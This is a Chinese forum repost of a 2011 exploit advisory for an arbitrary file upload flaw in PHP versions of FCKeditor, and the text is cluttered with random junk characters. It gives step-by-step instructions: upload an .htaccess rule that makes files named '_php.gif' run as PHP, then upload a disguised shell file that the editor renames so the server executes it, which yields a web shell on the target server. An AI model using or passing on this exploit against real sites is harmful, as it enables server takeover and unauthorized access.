| FCKeditor所有php版本Upload上传漏洞 作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07 l3 `; ]. X" \4 ~ 减小字体 增大字体, |$ G9 a2 u* p% \* A+ S4 b [+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability [+] Date: 2011 [+] Author : sinesafe.cn [+] Website : WwW.sinesafe.cn# B2 K5 q( q2 l- J' Y- ~ ——————————————————— 1.create a htaccess file:) n0 f+ n8 |9 P code:* O% B" h( H# o; l <FilesMatch “_php.gif”> SetHandler application/x-httpd-php; d) @0 T& d* _) Y </FilesMatch> * }# T" v/ Z9 y/ Y1 _5 e 2.Now upload this htaccess with FCKeditor. http://www.sinesafe.cn/FCKeditor ... er/upload/test.html( X* S- ]1 s, Q' n5 T; z http://www.sinesafe.cn/FCKeditor ... onnectors/test.html+ B, b/ O- A2 N+ y3 L ———————————————————————————————- 3.Now upload shell.php.gif with FCKeditor. 4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.2 B; ^! {) ]6 ~! U 5.http://www.sinesafe.cn/anything/shell_php.gif, P& c& l" E5 p3 M! i4 U 6.Now shell is available from server. |
| 欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |